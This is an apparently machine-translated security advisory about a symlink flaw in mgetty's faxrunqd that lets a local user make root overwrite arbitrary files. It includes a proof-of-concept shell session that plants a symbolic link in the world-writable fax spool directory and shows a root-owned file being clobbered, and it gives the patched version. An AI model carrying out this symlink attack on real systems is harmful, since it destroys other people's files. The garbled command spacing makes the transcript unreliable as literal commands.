Article Title: Denial of Service (DoS) attacks caused by the creation of the Linuxfaxrunqd file. Linux is a technology channel of the IT lab in China. Includes basic categories such as desktop applications, Linux system management, kernel research, embedded systems, and open source.
Affected Systems:
Mgetty 1.1.21 and earlier
-Linux redhat 6.2 and earlier versions
-Linux-Mandrake 7.1 and earlier
-Other unix systems with problems with mgetty
Unaffected system:
Mgetty 1.1.22
Description:
Mgetty contains a faxrunqd program, which is used to send tasks in the fax queue generated by faxspool (1.
During execution, the program will create a. last_run file in the/var/spool/outgoing/directory.
The directory is writable by anyone. In some mgetty versions, the faxrunqd does not check whether the file exists.
Or a linked file. Therefore, attackers may overwrite any system file and cause a denial of service attack.
<* Source: Stan Bubrouski (satan@fastdial.net) *>
Test method:
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
[User @ king/tmp] $ id
Uid = 200 (user) gid = 100 (users) groups = 100 (users)
[User @ king/tmp] $ ls-al/var/spool/fax/outgoing
Total 3
Drwxrwxrwt 3 root 1024 Jun 2 18:46.
Drwxr-xr-x 4 root 1024 Jun 2 ..
Drwxrwxrwx 2 root 1024 Jun 1 00:47 locks
[User @ king/tmp] $ ls-al/etc/smash_me
-Rw-r -- 1 root 12 Jun 2 18:45/etc/smash_me
[User @ king/tmp] $ cat/etc/smash_me
Smash me !!!
[User @ king/tmp] $ ln-s/etc/smash_me/var/spool/fax/outgoing/. last_run
[User @ king/tmp] $ ls-al/var/spool/fax/outgoing
Total 3
Drwxrwxrwt 3 root 1024 Jun 2 :48.
Drwxr-xr-x 4 root 1024 Jun 2 ..
Lrwxrwxrwx 1 user users 13 Jun 2 :48. last_run->
/Etc/smash_me
Drwxrwxrwx 2 root 1024 Jun 1 00:47 locks
Root console:
[Root @ king/tmp] # faxrunqd-l ttyS0
...
Remote unprivilaged user:
[User @ king/tmp] $ ls-al/var/spool/fax/outgoing
Total 3
Drwxrwxrwt 3 root 1024 Jun 2 :48.
Drwxr-xr-x 4 root 1024 Jun 2 ..
Lrwxrwxrwx 1 user users 13 Jun 2 :48. last_run->
/Etc/smash_me
Drwxrwxrwx 2 root 1024 Jun 1 00:47 locks
[User @ king/tmp] $ ls-al/etc/smash_me
-Rw-r -- 1 root 44 Jun 2 18:48/etc/smash_me
[User @ king/tmp] $ cat/etc/smash_me
Fri Jun 2 18:48:47 2000/usr/sbin/faxrunqd
Suggestion:
Mgetty 1.1.22 has solved this problem. You can download it at the following address:
Http://alpha.greenie.net/mgetty/